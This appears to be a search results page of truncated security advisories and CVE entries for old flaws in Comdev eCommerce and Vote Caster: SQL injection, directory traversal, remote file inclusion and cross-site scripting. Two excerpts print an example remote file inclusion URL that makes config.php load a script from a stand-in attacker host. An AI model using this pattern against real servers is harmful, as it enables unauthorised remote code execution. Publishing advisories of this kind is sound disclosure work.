120 matches found
Comdev Vote Caster 3.1 - 'index.php' SQL Injection
source: https://www.securityfocus.com/bid/15563/info Comdev Vote Caster is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of t...
CVE-2005-2543
The CVE-2005-2543 entry describes a directory traversal vulnerability in Comdev eCommerce 3.0, specifically in wce.download.php, where the download parameter can be abused with a .. (dot dot) to download arbitrary files. Affected product/component: Comdev eCommerce 3.0 / wce.download.php. Root ca...
CVE-2005-2543
Directory traversal vulnerability in wce.download.php in Comdev eCommerce 3.0 allows remote attackers to download arbitrary files via a .. dot dot in the download parameter...
CVE-2005-2544
PHP remote file inclusion vulnerability in config.php in Comdev eCommerce 3.0 allows remote attackers to execute arbitrary PHP code via the pathdocroot parameter...
CVE-2005-2544
The CVE-2005-2544 entry concerns Comdev eCommerce 3.0, where a PHP remote file inclusion flaw in config.php allows an attacker to execute arbitrary PHP code via path[docroot]. This is evidenced by multiple sources (NVD/CVE records and a Nessus plugin) describing remote code execution possibilitie...
Comdev eCommerce 3.0 Multiple Vulnerabilities (RFI, Traversal)
The remote host is running eCommerce, a web-based shopping system from Comdev. The installed version of eCommerce allows remote attackers to control the 'pathdocroot' parameter used when including PHP code in the 'config.php' script. By leveraging this flaw, an attacker may be able to view...
comdevTraversal.txt
Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The wce.download.php script present in two locations can be passed a "download" http request parameter to download an arbitrary file on the vulnerable server. Example:...
comdevInclusion.txt
Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...
Comdev eCommerce config.php Vulnerability
Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/14478/info Comdev eCommerce is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary server-side script code on an...
Comdev eCommerce 3.0 - 'WCE.download.php' Directory Traversal
source: https://www.securityfocus.com/bid/14479/info Comdev eCommerce is prone to a directory traversal vulnerability. A remote unauthorized user can disclose the contents of arbitrary local files through the use of directory traversal strings '../' relative to the Web application's root path...
Comdev eCommerce 3.0 - WCE.download.php Directory Traversal
Comdev eCommerce 3.0 - WCE.download.php Directory Traversal source: https://www.securityfocus.com/bid/14479/info Comdev eCommerce is prone to a directory traversal vulnerability. A remote unauthorized user can disclose the contents of arbitrary local files through the use of directory traversal...
Comdev eCommerce 3.0 - config.php Remote File Inclusion
Comdev eCommerce 3.0 - config.php Remote File Inclusion source: https://www.securityfocus.com/bid/14478/info Comdev eCommerce is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this...
CVE-2005-2138
CVE-2005-2138 describes a Cross-site Scripting (XSS) vulnerability in the Comdev eCommerce 3.0 and 3.1 product line, specifically in index.php. The flaw allows remote attackers to inject arbitrary web script or HTML by injecting Javascript into the onMouseOver event of an anchor tag in a review m...
CVE-2005-2138
Cross-site scripting XSS vulnerability in index.php in Comdev eCommerce 3.0 and 3.1 allows remote attackers to inject arbitrary web script or HTML via Javascript in the onMouseOver event of an "A" tag in a review message...
CVE-2005-2138
Cross-site scripting XSS vulnerability in index.php in Comdev eCommerce 3.0 and 3.1 allows remote attackers to inject arbitrary web script or HTML via Javascript in the onMouseOver event of an "A" tag in a review message...
[SA15865] Comdev eCommerce Review Script Insertion Vulnerability
---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...
[UNIX] Comdev eCommerce Cross Site Scripting
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...
Comdev eCommerce 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/12382/info Comdev eCommerce is reported prone to multiple cross-site scripting vulnerabilities. These may facilitate theft of cookie-based authentication credentials as well as other attacks. Comdev eCommerce 3.0 is reported prone to these issues. It is...
Comdev eCommerce 3.0 - index.php Multiple Cross-Site Scripting Vulnerabilities
Comdev eCommerce 3.0 - index.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/12382/info Comdev eCommerce is reported prone to multiple cross-site scripting vulnerabilities. These may facilitate theft of cookie-based authentication credentials as well as...